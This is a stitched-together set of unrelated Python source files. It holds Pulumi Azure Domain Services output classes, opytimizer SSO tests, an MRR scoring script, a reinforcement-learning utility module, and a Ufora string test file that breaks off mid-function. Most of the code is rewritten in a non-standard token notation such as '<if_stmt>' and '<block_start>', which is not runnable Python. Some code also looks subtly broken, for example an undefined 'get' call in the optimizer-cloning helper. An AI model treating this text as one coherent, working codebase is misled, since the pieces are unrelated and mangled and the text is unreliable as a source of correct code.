"""<if_stmt>ntlm_v1_enabled<is><not><none><block_start>pulumi.set(__self__ "ntlm_v1_enabled" ntlm_v1_enabled)<block_end><if_stmt>sync_kerberos_passwords<is><not><none><block_start>pulumi.set(__self__ "sync_kerberos_passwords" sync_kerberos_passwords)<block_end><if_stmt>sync_ntlm_passwords<is><not><none><block_start>pulumi.set(__self__ "sync_ntlm_passwords" sync_ntlm_passwords)<block_end><if_stmt>sync_on_prem_passwords<is><not><none><block_start>pulumi.set(__self__ "sync_on_prem_passwords" sync_on_prem_passwords)<block_end><if_stmt>tls_v1_enabled<is><not><none><block_start>pulumi.set(__self__ "tls_v1_enabled" tls_v1_enabled)<block_end><block_end>@property@pulumi.getter(name="ntlmV1Enabled")<def_stmt>ntlm_v1_enabled self<arrow>Optional[bool]<block_start>""" Whether to enable legacy NTLM v1 support. Defaults to `false`. """<line_sep><return>pulumi.get(self "ntlm_v1_enabled")<block_end>@property@pulumi.getter(name="syncKerberosPasswords")<def_stmt>sync_kerberos_passwords self<arrow>Optional[bool]<block_start>""" Whether to synchronize Kerberos password hashes to the managed domain. Defaults to `false`. """<line_sep><return>pulumi.get(self "sync_kerberos_passwords")<block_end>@property@pulumi.getter(name="syncNtlmPasswords")<def_stmt>sync_ntlm_passwords self<arrow>Optional[bool]<block_start>""" Whether to synchronize NTLM password hashes to the managed domain. Defaults to `false`. """<line_sep><return>pulumi.get(self "sync_ntlm_passwords")<block_end>@property@pulumi.getter(name="syncOnPremPasswords")<def_stmt>sync_on_prem_passwords self<arrow>Optional[bool]<block_start>""" Whether to synchronize on-premises password hashes to the managed domain. Defaults to `false`. """<line_sep><return>pulumi.get(self "sync_on_prem_passwords")<block_end>@property@pulumi.getter(name="tlsV1Enabled")<def_stmt>tls_v1_enabled self<arrow>Optional[bool]<block_start>""" Whether to enable legacy TLS v1 support. Defaults to `false`. 
"""<line_sep><return>pulumi.get(self "tls_v1_enabled")<block_end><block_end>@pulumi.output_type<class_stmt>GetServiceNotificationResult(dict)<block_start><def_stmt>__init__ __self__ * additional_recipients:Sequence[str] notify_dc_admins:bool notify_global_admins:bool<block_start>""" :param Sequence[str] additional_recipients: A list of additional email addresses to notify when there are alerts in the managed domain. :param bool notify_dc_admins: Whethermembers of the _AAD DC Administrators_ group are notified when there are alerts in the managed domain. :param bool notify_global_admins: Whether all Global Administrators are notified when there are alerts in the managed domain. """<line_sep>pulumi.set(__self__ "additional_recipients" additional_recipients)<line_sep>pulumi.set(__self__ "notify_dc_admins" notify_dc_admins)<line_sep>pulumi.set(__self__ "notify_global_admins" notify_global_admins)<block_end>@property@pulumi.getter(name="additionalRecipients")<def_stmt>additional_recipients self<arrow>Sequence[str]<block_start>""" A list of additional email addresses to notify when there are alerts in the managed domain. """<line_sep><return>pulumi.get(self "additional_recipients")<block_end>@property@pulumi.getter(name="notifyDcAdmins")<def_stmt>notify_dc_admins self<arrow>bool<block_start>""" Whethermembers of the _AAD DC Administrators_ group are notified when there are alerts in the managed domain. """<line_sep><return>pulumi.get(self "notify_dc_admins")<block_end>@property@pulumi.getter(name="notifyGlobalAdmins")<def_stmt>notify_global_admins self<arrow>bool<block_start>""" Whether all Global Administrators are notified when there are alerts in the managed domain. 
"""<line_sep><return>pulumi.get(self "notify_global_admins")<block_end><block_end>@pulumi.output_type<class_stmt>GetServiceReplicaSetResult(dict)<block_start><def_stmt>__init__ __self__ * domain_controller_ip_addresses:Sequence[str] external_access_ip_address:str id:str location:str service_status:str subnet_id:str<block_start>""" :param Sequence[str] domain_controller_ip_addresses: A list of subnet IP addresses for the domain controllers in the replica set, typically two. :param str external_access_ip_address: The publicly routable IP address for the domain controllers in the replica set. :param str id: The ID of the Domain Service. :param str location: The Azure location in which the replica set resides. :param str service_status: The current service status for the replica set. :param str subnet_id: The ID of the subnet in which the replica set resides. """<line_sep>pulumi.set(__self__ "domain_controller_ip_addresses" domain_controller_ip_addresses)<line_sep>pulumi.set(__self__ "external_access_ip_address" external_access_ip_address)<line_sep>pulumi.set(__self__ "id" id)<line_sep>pulumi.set(__self__ "location" location)<line_sep>pulumi.set(__self__ "service_status" service_status)<line_sep>pulumi.set(__self__ "subnet_id" subnet_id)<block_end>@property@pulumi.getter(name="domainControllerIpAddresses")<def_stmt>domain_controller_ip_addresses self<arrow>Sequence[str]<block_start>""" A list of subnet IP addresses for the domain controllers in the replica set, typically two. """<line_sep><return>pulumi.get(self "domain_controller_ip_addresses")<block_end>@property@pulumi.getter(name="externalAccessIpAddress")<def_stmt>external_access_ip_address self<arrow>str<block_start>""" The publicly routable IP address for the domain controllers in the replica set. """<line_sep><return>pulumi.get(self "external_access_ip_address")<block_end>@property@pulumi.getter<def_stmt>id self<arrow>str<block_start>""" The ID of the Domain Service. 
"""<line_sep><return>pulumi.get(self "id")<block_end>@property@pulumi.getter<def_stmt>location self<arrow>str<block_start>""" The Azure location in which the replica set resides. """<line_sep><return>pulumi.get(self "location")<block_end>@property@pulumi.getter(name="serviceStatus")<def_stmt>service_status self<arrow>str<block_start>""" The current service status for the replica set. """<line_sep><return>pulumi.get(self "service_status")<block_end>@property@pulumi.getter(name="subnetId")<def_stmt>subnet_id self<arrow>str<block_start>""" The ID of the subnet in which the replica set resides. """<line_sep><return>pulumi.get(self "subnet_id")<block_end><block_end>@pulumi.output_type<class_stmt>GetServiceSecureLdapResult(dict)<block_start><def_stmt>__init__ __self__ * certificate_expiry:str certificate_thumbprint:str enabled:bool external_access_enabled:bool public_certificate:str<block_start>""" :param bool enabled: Whether secure LDAP is enabled for the managed domain. :param bool external_access_enabled: Whether external access to LDAPS over the Internet, is enabled. """<line_sep>pulumi.set(__self__ "certificate_expiry" certificate_expiry)<line_sep>pulumi.set(__self__ "certificate_thumbprint" certificate_thumbprint)<line_sep>pulumi.set(__self__ "enabled" enabled)<line_sep>pulumi.set(__self__ "external_access_enabled" external_access_enabled)<line_sep>pulumi.set(__self__ "public_certificate" public_certificate)<block_end>@property@pulumi.getter(name="certificateExpiry")<def_stmt>certificate_expiry self<arrow>str<block_start><return>pulumi.get(self "certificate_expiry")<block_end>@property@pulumi.getter(name="certificateThumbprint")<def_stmt>certificate_thumbprint self<arrow>str<block_start><return>pulumi.get(self "certificate_thumbprint")<block_end>@property@pulumi.getter<def_stmt>enabled self<arrow>bool<block_start>""" Whether secure LDAP is enabled for the managed domain. 
"""<line_sep><return>pulumi.get(self "enabled")<block_end>@property@pulumi.getter(name="externalAccessEnabled")<def_stmt>external_access_enabled self<arrow>bool<block_start>""" Whether external access to LDAPS over the Internet, is enabled. """<line_sep><return>pulumi.get(self "external_access_enabled")<block_end>@property@pulumi.getter(name="publicCertificate")<def_stmt>public_certificate self<arrow>str<block_start><return>pulumi.get(self "public_certificate")<block_end><block_end>@pulumi.output_type<class_stmt>GetServiceSecurityResult(dict)<block_start><def_stmt>__init__ __self__ * ntlm_v1_enabled:bool sync_kerberos_passwords:bool sync_ntlm_passwords:bool sync_on_prem_passwords:bool tls_v1_enabled:bool<block_start>""" :param bool ntlm_v1_enabled: Whether legacy NTLM v1 support is enabled. :param bool sync_kerberos_passwords: Whether Kerberos password hashes are synchronized to the managed domain. :param bool sync_ntlm_passwords: Whether NTLM password hashes are synchronized to the managed domain. :param bool sync_on_prem_passwords: Whether on-premises password hashes are synchronized to the managed domain. :param bool tls_v1_enabled: Whether legacy TLS v1 support is enabled. """<line_sep>pulumi.set(__self__ "ntlm_v1_enabled" ntlm_v1_enabled)<line_sep>pulumi.set(__self__ "sync_kerberos_passwords" sync_kerberos_passwords)<line_sep>pulumi.set(__self__ "sync_ntlm_passwords" sync_ntlm_passwords)<line_sep>pulumi.set(__self__ "sync_on_prem_passwords" sync_on_prem_passwords)<line_sep>pulumi.set(__self__ "tls_v1_enabled" tls_v1_enabled)<block_end>@property@pulumi.getter(name="ntlmV1Enabled")<def_stmt>ntlm_v1_enabled self<arrow>bool<block_start>""" Whether legacy NTLM v1 support is enabled. """<line_sep><return>pulumi.get(self "ntlm_v1_enabled")<block_end>@property@pulumi.getter(name="syncKerberosPasswords")<def_stmt>sync_kerberos_passwords self<arrow>bool<block_start>""" Whether Kerberos password hashes are synchronized to the managed domain. 
"""<line_sep><return>pulumi.get(self "sync_kerberos_passwords")<block_end>@property@pulumi.getter(name="syncNtlmPasswords")<def_stmt>sync_ntlm_passwords self<arrow>bool<block_start>""" Whether NTLM password hashes are synchronized to the managed domain. """<line_sep><return>pulumi.get(self "sync_ntlm_passwords")<block_end>@property@pulumi.getter(name="syncOnPremPasswords")<def_stmt>sync_on_prem_passwords self<arrow>bool<block_start>""" Whether on-premises password hashes are synchronized to the managed domain. """<line_sep><return>pulumi.get(self "sync_on_prem_passwords")<block_end>@property@pulumi.getter(name="tlsV1Enabled")<def_stmt>tls_v1_enabled self<arrow>bool<block_start>""" Whether legacy TLS v1 support is enabled. """<line_sep><return>pulumi.get(self "tls_v1_enabled")<block_end><block_end>
<import_stmt>numpy<as>np<import_from_stmt>opytimizer.optimizers.swarm sso<import_from_stmt>opytimizer.spaces search<def_stmt>test_sso_params <block_start>params={'C_w':0.1 'C_p':0.4 'C_g':0.9}<line_sep>new_sso=sso.SSO(params=params)<assert_stmt>new_sso.C_w<eq>0.1<assert_stmt>new_sso.C_p<eq>0.4<assert_stmt>new_sso.C_g<eq>0.9<block_end><def_stmt>test_sso_params_setter <block_start>new_sso=sso.SSO()<try_stmt><block_start>new_sso.C_w='a'<block_end><except_stmt><block_start>new_sso.C_w=0.1<block_end><try_stmt><block_start>new_sso.C_w=-1<block_end><except_stmt><block_start>new_sso.C_w=0.1<block_end><assert_stmt>new_sso.C_w<eq>0.1<try_stmt><block_start>new_sso.C_p='b'<block_end><except_stmt><block_start>new_sso.C_p=0.4<block_end><try_stmt><block_start>new_sso.C_p=0.05<block_end><except_stmt><block_start>new_sso.C_p=0.4<block_end><assert_stmt>new_sso.C_p<eq>0.4<try_stmt><block_start>new_sso.C_g='c'<block_end><except_stmt><block_start>new_sso.C_g=0.9<block_end><try_stmt><block_start>new_sso.C_g=0.35<block_end><except_stmt><block_start>new_sso.C_g=0.9<block_end><assert_stmt>new_sso.C_g<eq>0.9<block_end><def_stmt>test_sso_compile <block_start>search_space=search.SearchSpace(n_agents=10 n_variables=2 lower_bound=[0 0] upper_bound=[10 10])<line_sep>new_sso=sso.SSO()<line_sep>new_sso.compile(search_space)<try_stmt><block_start>new_sso.local_position=1<block_end><except_stmt><block_start>new_sso.local_position=np.array([1])<block_end><assert_stmt>new_sso.local_position<eq>np.array([1])<block_end><def_stmt>test_sso_evaluate <block_start><def_stmt>square x<block_start><return>np.sum(x<power>2)<block_end>search_space=search.SearchSpace(n_agents=10 n_variables=2 lower_bound=[0 0] upper_bound=[10 10])<line_sep>new_sso=sso.SSO()<line_sep>new_sso.compile(search_space)<line_sep>new_sso.evaluate(search_space square)<block_end><def_stmt>test_sso_update <block_start>search_space=search.SearchSpace(n_agents=10 n_variables=2 lower_bound=[0 0] upper_bound=[10 
10])<line_sep>new_sso=sso.SSO()<line_sep>new_sso.compile(search_space)<line_sep>new_sso.update(search_space)<block_end>
<import_stmt>argparse<import_stmt>csv<import_stmt>sys<import_stmt>os<line_sep>sys.path.append(os.path.dirname(os.path.dirname(__file__)))<import_from_stmt>modules.metric mean_reciprocal_rank<def_stmt>main csv_path<block_start>acc=0<line_sep>num=0<with_stmt>open(csv_path "r")<as>csv_file<block_start>csv_reader=csv.reader(csv_file delimiter=',')<line_sep>line_count=0<for_stmt>row csv_reader<block_start><if_stmt>line_count<g>0<block_start>hum_id=row[0].split(".")[0]<line_sep>preds=[]<for_stmt>col row[1:]<block_start>preds.append(str(col))<block_end>print(hum_id mean_reciprocal_rank(preds str(hum_id)))<line_sep>acc<augadd>mean_reciprocal_rank(preds str(hum_id))<line_sep>num<augadd>1<block_end>line_count<augadd>1<block_end>print(f'Processed {line_count} lines.')<block_end><return>acc/num<block_end><if_stmt>__name__<eq>"__main__"<block_start>parser=argparse.ArgumentParser()<line_sep>parser.add_argument("--csv_path" type=str required=<true> help="path to predict csv")<line_sep>args=parser.parse_args()<line_sep>mrr=main(args.csv_path)<line_sep>print("-----------------------------")<line_sep>print(f"MRR: {mrr}")<block_end>
<import_stmt>argparse<import_stmt>collections<import_stmt>inspect<import_stmt>json<import_stmt>logging<import_stmt>multiprocessing<as>mp<import_stmt>numpy<as>np<import_stmt>re<import_stmt>sys<import_stmt>zipfile<import_from_stmt>datetime datetime timedelta<import_from_stmt>os path listdir environ getpid<import_from_stmt>textwrap wrap<line_sep>PARALLEL_PROCESS_NUM=mp.cpu_count()<line_sep>TIMESTAMP_REGEX=r'(\d{4}_\d{2}_\d{2}_\d{6})'<line_sep>SPEC_PATH=path.join(path.dirname(__file__) 'spec')<line_sep>COMPONENT_LOCKS=json.loads(open(path.join(SPEC_PATH 'component_locks.json')).read())<line_sep>LOCK_HEAD_REST_SIG={# signature list of [head, rest] in component lock 'mutex':[[0 0] [1 1]] 'subset':[[0 0] [1 0] [1 1]] }<line_sep># parse_args to add flag parser=argparse.ArgumentParser(description='Set flags for functions')<line_sep>parser.add_argument("-b" "--blind" help="dont render graphics" action="store_const" dest="render" const=<false> default=<true>)<line_sep>parser.add_argument("-d" "--debug" help="activate debug log" action="store_const" dest="loglevel" const=logging.DEBUG default=logging.INFO)<line_sep>parser.add_argument("-e" "--experiment" help="specify experiment to run" action="store" type=str nargs='?' dest="experiment" default="dev_dqn")<line_sep>parser.add_argument("-p" "--param_selection" help="run parameter selection if present" action="store_true" dest="param_selection" default=<false>)<line_sep>parser.add_argument("-q" "--quiet" help="change log to warning level" action="store_const" dest="loglevel" const=logging.WARNING default=logging.INFO)<line_sep>parser.add_argument("-t" "--times" help="number of times session is run" action="store" nargs='?' type=int dest="times" default=1)<line_sep>parser.add_argument("-x" "--max_episodes" help="manually set environment max episodes" action="store" nargs='?' 
type=int dest="max_epis" default=-1)<line_sep>args=parser.parse_args([])<if>environ.get('CI')<else>parser.parse_args()<line_sep># Goddam python logger logger=logging.getLogger(__name__)<line_sep>handler=logging.StreamHandler(sys.stdout)<line_sep>handler.setFormatter(logging.Formatter('[%(asctime)s] %(levelname)s: %(message)s'))<line_sep>logger.setLevel(args.loglevel)<line_sep>logger.addHandler(handler)<line_sep>logger.propagate=<false><line_sep>environ['TF_CPP_MIN_LOG_LEVEL']='3'# mute tf warnings on optimized setup <def_stmt>check_equal iterator<block_start>'''check if list contains all the same elements'''<line_sep>iterator=iter(iterator)<try_stmt><block_start>first=next(iterator)<block_end><except_stmt>StopIteration<block_start><return><true><block_end><return>all(first<eq>rest<for>rest iterator)<block_end><def_stmt>check_lock lock_name lock experiment_spec<block_start>''' refer to rl/spec/component_locks.json check a spec's component lock using binary signatures e.g. head = problem (discrete) rest = [Agent, Policy] (to be discrete too) first check if rest all has the same signature, i.e. 
same set then check pair [bin_head, bin_rest] in valid_lock_sig_list as specified by the lock's type '''<line_sep>lock_type=lock['type']<line_sep>valid_lock_sig_list=LOCK_HEAD_REST_SIG[lock_type]<line_sep>lock_head=lock['head']<line_sep>bin_head=(experiment_spec[lock_head]<in>lock[lock_head])<line_sep>bin_rest_list=[]<for_stmt>k,v_list lock.items()<block_start><if_stmt>k<in>experiment_spec<and>k<ne>lock_head<block_start>bin_rest_list.append(experiment_spec[k]<in>v_list)<block_end><block_end># rest must all have the same signature rest_equal=check_equal(bin_rest_list)<if_stmt><not>rest_equal<block_start>logger.warn('All components need to be of the same set, '<concat>'check component lock "{}" and your spec "{}"'.format(lock_name experiment_spec['experiment_name']))<block_end>bin_rest=bin_rest_list[0]<line_sep>lock_sig=[bin_head bin_rest]<line_sep>lock_valid=lock_sig<in>valid_lock_sig_list<if_stmt><not>lock_valid<block_start>logger.warn('Component lock violated: "{}", spec: "{}"'.format(lock_name experiment_spec['experiment_name']))<block_end><return>lock_valid<block_end><def_stmt>check_component_locks experiment_spec<block_start>''' check the spec components for all locks to ensure no lock is violated refer to rl/spec/component_locks.json '''<for_stmt>lock_name,lock COMPONENT_LOCKS.items()<block_start>check_lock(lock_name lock experiment_spec)<block_end><return><block_end># import and safeguard the PROBLEMS, EXPERIMENT_SPECS with checks <def_stmt>import_guard_asset <block_start>PROBLEMS=json.loads(open(path.join(SPEC_PATH 'problems.json')).read())<line_sep>EXPERIMENT_SPECS={}<line_sep>spec_files=[spec_json<for>spec_json listdir(SPEC_PATH)<if>spec_json.endswith('experiment_specs.json')]<for_stmt>filename spec_files<block_start>specs=json.loads(open(path.join(SPEC_PATH filename)).read())<line_sep>EXPERIMENT_SPECS.update(specs)<block_end>REQUIRED_PROBLEM_KEYS=['GYM_ENV_NAME' 'SOLVED_MEAN_REWARD' 'MAX_EPISODES' 'REWARD_MEAN_LEN']<line_sep>REQUIRED_SPEC_KEYS=['problem' 
'Agent' 'HyperOptimizer' 'Memory' 'Optimizer' 'Policy' 'PreProcessor' 'param']<for_stmt>problem_name,problem PROBLEMS.items()<block_start><assert_stmt>all(k<in>problem<for>k REQUIRED_PROBLEM_KEYS) '{} needs all REQUIRED_PROBLEM_KEYS'.format(problem_name)<block_end><for_stmt>experiment_name,spec EXPERIMENT_SPECS.items()<block_start><assert_stmt>all(k<in>spec<for>k REQUIRED_SPEC_KEYS) '{} needs all REQUIRED_SPEC_KEYS'.format(experiment_name)<line_sep>EXPERIMENT_SPECS[experiment_name]['experiment_name']=experiment_name<line_sep>check_component_locks(spec)# check component_locks.json <if_stmt>'param_range'<not><in>EXPERIMENT_SPECS[experiment_name]<block_start><continue><block_end>param_range=EXPERIMENT_SPECS[experiment_name]['param_range']<for_stmt>param_key,param_val param_range.items()<block_start><if_stmt>isinstance(param_val list)<block_start>param_range[param_key]=sorted(param_val)<block_end><elif_stmt>isinstance(param_val dict)<block_start><pass><block_end><else_stmt><block_start><assert_stmt><false> 'param_range value must be list or dict: {}.{}:{}'.format(experiment_name param_key param_val)<block_end><block_end>EXPERIMENT_SPECS[experiment_name]['param_range']=param_range<block_end><return>PROBLEMS EXPERIMENT_SPECS<block_end>PROBLEMS,EXPERIMENT_SPECS=import_guard_asset()<def_stmt>log_self subject<block_start>max_info_len=300<line_sep>info='{}, param: {}'.format(subject.__class__.__name__ to_json(subject.__dict__))<line_sep>trunc_info=(info[:max_info_len]+'...'<if>len(info)<g>max_info_len<else>info)<line_sep>logger.debug(trunc_info)<block_end><def_stmt>wrap_text text<block_start><return>'\n'.join(wrap(text 60))<block_end><def_stmt>make_line line='-'<block_start><if_stmt>environ.get('CI')<block_start><return><block_end>columns=80<line_sep>line_str=line<times>int(columns)<line_sep><return>line_str<block_end><def_stmt>log_delimiter msg line='-'<block_start>delim_msg='''\n{0}\n{1}\n{0}\n\n'''.format(make_line(line) 
msg)<line_sep>logger.info(delim_msg)<block_end><def_stmt>log_trial_delimiter trial action<block_start>log_delimiter('{} Trial #{}/{} on PID {}:\n{}'.format(action trial.trial_num trial.num_of_trials getpid() trial.trial_id) '=')<block_end><def_stmt>log_session_delimiter sess action<block_start>log_delimiter('{} Session #{}/{} of Trial #{}/{} on PID {}:\n{}'.format(action sess.session_num sess.num_of_sessions sess.trial.trial_num sess.trial.num_of_trials getpid() sess.session_id))<block_end><def_stmt>timestamp <block_start>'''timestamp used for filename'''<line_sep>timestamp_str='{:%Y_%m_%d_%H%M%S}'.format(datetime.now())<assert_stmt>re.search(TIMESTAMP_REGEX timestamp_str)<line_sep><return>timestamp_str<block_end><def_stmt>timestamp_elapse s1 s2<block_start>'''calculate the time elapsed between timestamps from s1 to s2'''<line_sep>FMT='%Y_%m_%d_%H%M%S'<line_sep>delta_t=datetime.strptime(s2 FMT)-datetime.strptime(s1 FMT)<line_sep><return>str(delta_t)<block_end><def_stmt>timestamp_elapse_to_seconds s1<block_start>a=datetime.strptime(s1 '%H:%M:%S')<line_sep>secs=timedelta(hours=a.hour minutes=a.minute seconds=a.second).seconds<line_sep><return>secs<block_end># own custom sorted json serializer, cuz python <def_stmt>to_json o level=0<block_start>INDENT=2<line_sep>SPACE=" "<line_sep>NEWLINE="\n"<line_sep>ret=""<if_stmt>isinstance(o dict)<block_start>ret<augadd>"{"+NEWLINE<line_sep>comma=""<for_stmt>k sorted(o.keys())<block_start>v=o[k]<line_sep>ret<augadd>comma<line_sep>comma=",\n"<line_sep>ret<augadd>SPACE<times>INDENT<times>(level+1)<line_sep>ret<augadd>'"'+str(k)+'":'+SPACE<line_sep>ret<augadd>to_json(v level+1)<block_end>ret<augadd>NEWLINE+SPACE<times>INDENT<times>level+"}"<block_end><elif_stmt>isinstance(o str)<block_start>ret<augadd>'"'+o+'"'<block_end><elif_stmt>isinstance(o list)<or>isinstance(o tuple)<block_start>ret<augadd>"["+",".join([to_json(e level+1)<for>e o])+"]"<block_end><elif_stmt>isinstance(o 
bool)<block_start>ret<augadd>"true"<if>o<else>"false"<block_end><elif_stmt>isinstance(o int)<block_start>ret<augadd>str(o)<block_end><elif_stmt>isinstance(o float)<block_start>ret<augadd>'%.7g'%o<block_end><elif_stmt>isinstance(o np.ndarray)<and>np.issubdtype(o.dtype np.integer)<block_start>ret<augadd>"["+','.join(map(str o.flatten().tolist()))+"]"<block_end><elif_stmt>isinstance(o np.ndarray)<and>np.issubdtype(o.dtype np.inexact)<block_start>ret<augadd>"["+','.join(map(<lambda>x:'%.7g'%x o.flatten().tolist()))+"]"<block_end><elif_stmt>o<is><none><block_start>ret<augadd>'null'<block_end><elif_stmt>hasattr(o '__class__')<block_start>ret<augadd>'"'+o.__class__.__name__+'"'<block_end><else_stmt><block_start><raise>TypeError("Unknown type '%s' for json serialization"%str(type(o)))<block_end><return>ret<block_end># format object and its properties into printable dict <def_stmt>format_obj_dict obj keys<block_start><if_stmt>isinstance(obj dict)<block_start><return>to_json({k:obj.get(k)<for>k keys<if>obj.get(k)<is><not><none>})<block_end><else_stmt><block_start><return>to_json({k:getattr(obj k <none>)<for>k keys<if>getattr(obj k <none>)<is><not><none>})<block_end><block_end># cast dict to have flat values (int, float, str) <def_stmt>flat_cast_dict d<block_start><for_stmt>k d<block_start>v=d[k]<if_stmt><not>isinstance(v (int float))<block_start>d[k]=str(v)<block_end><block_end><return>d<block_end><def_stmt>flatten_dict d parent_key='' sep='_'<block_start>items=[]<for_stmt>k,v d.items()<block_start>new_key=parent_key+sep+k<if>parent_key<else>k<if_stmt>isinstance(v collections.MutableMapping)<block_start>items.extend(flatten_dict(v new_key sep=sep).items())<block_end><else_stmt><block_start>items.append((new_key v))<block_end><block_end><return>dict(items)<block_end><def_stmt>get_module GREF dot_path# get module from globals() by string dot_path <block_start>path_arr=dot_path.split('.')<line_sep># base level from globals mod=GREF.get(path_arr.pop(0))<for_stmt>deeper_path 
path_arr<block_start>mod=getattr(mod deeper_path)<block_end><return>mod<block_end><def_stmt>import_package_files globals_ locals_ __file__<block_start>''' Dynamically import all the public attributes of the python modules in this file's directory (the package directory) and return a list of their names. '''<line_sep>exports=[]<line_sep># globals_, locals_ = globals(), locals() package_path=path.dirname(__file__)<line_sep>package_name=path.basename(package_path)<for_stmt>filename listdir(package_path)<block_start>modulename,ext=path.splitext(filename)<if_stmt>modulename[0]<ne>'_'<and>ext<in>('.py' '.pyw')<block_start>subpackage='{}.{}'.format(package_name modulename)<line_sep># pkg relative module=__import__(subpackage globals_ locals_ [modulename])<line_sep>modict=module.__dict__<line_sep>names=(modict['__all__']<if>'__all__'<in>modict<else>[name<for>name modict<if>inspect.isclass(modict[name])])<line_sep># all public exports.extend(names)<line_sep>globals_.update((name modict[name])<for>name names)<block_end><block_end><return>exports<block_end><def_stmt>clean_id_str id_str<block_start><return>id_str.split('/').pop().split('.').pop(0)<block_end><def_stmt>parse_trial_id id_str<block_start>c_id_str=clean_id_str(id_str)<if_stmt>re.search(TIMESTAMP_REGEX c_id_str)<block_start>name_time_trial=re.split(TIMESTAMP_REGEX c_id_str)<if_stmt>len(name_time_trial)<eq>3<block_start><return>c_id_str<block_end><else_stmt><block_start><return><none><block_end><block_end><else_stmt><block_start><return><none><block_end><block_end><def_stmt>parse_experiment_id id_str<block_start>c_id_str=clean_id_str(id_str)<if_stmt>re.search(TIMESTAMP_REGEX c_id_str)<block_start>name_time_trial=re.split(TIMESTAMP_REGEX c_id_str)<line_sep>name_time_trial.pop()<line_sep>experiment_id=''.join(name_time_trial)<line_sep><return>experiment_id<block_end><else_stmt><block_start><return><none><block_end><block_end><def_stmt>parse_experiment_name 
id_str<block_start>c_id_str=clean_id_str(id_str)<line_sep>experiment_id=parse_experiment_id(c_id_str)<if_stmt>experiment_id<is><none><block_start>experiment_name=c_id_str<block_end><else_stmt><block_start>experiment_name=re.sub(TIMESTAMP_REGEX '' experiment_id).strip('-')<block_end><assert_stmt>experiment_name<in>EXPERIMENT_SPECS '{} not in EXPERIMENT_SPECS'.format(experiment_name)<line_sep><return>experiment_name<block_end><def_stmt>load_data_from_trial_id id_str<block_start>experiment_id=parse_experiment_id(id_str)<line_sep>trial_id=parse_trial_id(id_str)<line_sep>data_filename='./data/{}/{}.json'.format(experiment_id trial_id)<try_stmt><block_start>data=json.loads(open(data_filename).read())<block_end><except_stmt>(FileNotFoundError json.JSONDecodeError)<block_start>data=<none><block_end><return>data<block_end><def_stmt>load_data_array_from_experiment_id id_str# to load all ./data files for a series of trials <block_start>experiment_id=parse_experiment_id(id_str)<line_sep>data_path='./data/{}'.format(experiment_id)<line_sep>trial_id_array=[f<for>f listdir(data_path)<if>(path.isfile(path.join(data_path f))<and>f.startswith(experiment_id)<and>f.endswith('.json'))]<line_sep><return>list(filter(<none> [load_data_from_trial_id(trial_id)<for>trial_id trial_id_array]))<block_end><def_stmt>save_experiment_data data_df trial_id<block_start>experiment_id=parse_experiment_id(trial_id)<line_sep>filedir='./data/{0}'.format(experiment_id)<line_sep>filename='{0}_analysis_data.csv'.format(experiment_id)<line_sep>filepath='{}/{}'.format(filedir filename)<line_sep>data_df.round(6).to_csv(filepath index=<false>)<line_sep># zip the csv and best trial json for upload to PR zipfile.ZipFile(filepath+'.zip' mode='w').write(filepath arcname=filename)<line_sep>trial_filename=data_df.loc[0 'trial_id']+'.json'<line_sep>trial_filepath='{}/{}'.format(filedir trial_filename)<line_sep>zipfile.ZipFile(trial_filepath+'.zip' mode='w').write(trial_filepath 
arcname=trial_filename)<line_sep>logger.info('experiment data saved to {}'.format(filepath))<block_end><def_stmt>configure_hardware RAND_SEED<block_start>'''configure rand seed, GPU'''<import_from_stmt>keras backend<as>K<if_stmt>K.backend()<eq>'tensorflow'<block_start>K.tf.set_random_seed(RAND_SEED)<block_end><else_stmt><block_start>K.theano.tensor.shared_randomstreams.RandomStreams(seed=RAND_SEED)<block_end><if_stmt>K.backend()<ne>'tensorflow'# GPU config for tf only <block_start><return><block_end>process_num=PARALLEL_PROCESS_NUM<if>args.param_selection<else>1<line_sep>tf=K.tf<line_sep>gpu_options=tf.GPUOptions(allow_growth=<true> per_process_gpu_memory_fraction=1./float(process_num))<line_sep>config=tf.ConfigProto(gpu_options=gpu_options allow_soft_placement=<true>)<line_sep>sess=tf.Session(config=config)<line_sep>K.set_session(sess)<line_sep><return>sess<block_end><def_stmt>debug_mem_usage <block_start><import_stmt>psutil<import_from_stmt>mem_top mem_top<line_sep>pid=getpid()<line_sep>logger.debug('MEM USAGE for PID {}, MEM_INFO: {}\n{}'.format(pid psutil.Process().memory_info() mem_top()))<block_end><def_stmt>del_self_attr subject<block_start>self_attrs=list(subject.__dict__.keys())<for_stmt>attr self_attrs<block_start>delattr(subject attr)<block_end><import_stmt>gc<line_sep>gc.collect()<block_end># clone a keras model without file I/O <def_stmt>clone_model model custom_objects=<none><block_start><import_from_stmt>keras.models model_from_config<line_sep>custom_objects=custom_objects<or>{}<line_sep>config={'class_name':model.__class__.__name__ 'config':model.get_config() }<line_sep>clone=model_from_config(config custom_objects=custom_objects)<line_sep>clone.set_weights(model.get_weights())<line_sep><return>clone<block_end># clone a keras optimizer without file I/O <def_stmt>clone_optimizer optimizer<block_start><import_from_stmt>keras.optimizers optimizer_from_config<if_stmt>isinstance(optimizer str)<block_start><return>get(optimizer)<block_end>params=dict([(k 
v)<for>k,v optimizer.get_config().items()])<line_sep>config={'class_name':optimizer.__class__.__name__ 'config':params }<line_sep>clone=optimizer_from_config(config)<line_sep><return>clone<block_end>
# Copyright 2015 Ufora Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

import time

import ufora.test.PerformanceTestReporter as PerformanceTestReporter

import sys


class StringTestCases(object):
    """Test cases for pyfora strings.

    Mixin: the concrete test class is expected to provide
    `equivalentEvaluationTest`, `evaluateWithExecutor`, `create_executor`
    and the unittest assertion methods.
    """

    def test_string_indexing(self):
        # Positive and negative indexing must agree with CPython.
        def f():
            a = "abc"
            return (a[0], a[1], a[2], a[-1], a[-2])

        self.equivalentEvaluationTest(f)

    def test_strings_with_weird_characters(self):
        # Non-ASCII byte in a str literal, captured both by closure and inline.
        x = "\xb0"

        def f():
            return (x, "\xb0")

        self.equivalentEvaluationTest(f)

    def test_large_string_indexing_perf(self):
        def f(ct, passCt):
            # Build a string of roughly `ct` characters and index every position
            # `passCt` times; returns a checksum so the work cannot be elided.
            x = "asdfasdf" * (ct / 8)
            res = 0
            for _ in xrange(passCt):
                for ix in xrange(len(x)):
                    res = res + len(x[ix])
            return res

        # Warm-up runs before the measured runs.
        self.evaluateWithExecutor(f, 1000000, 1)
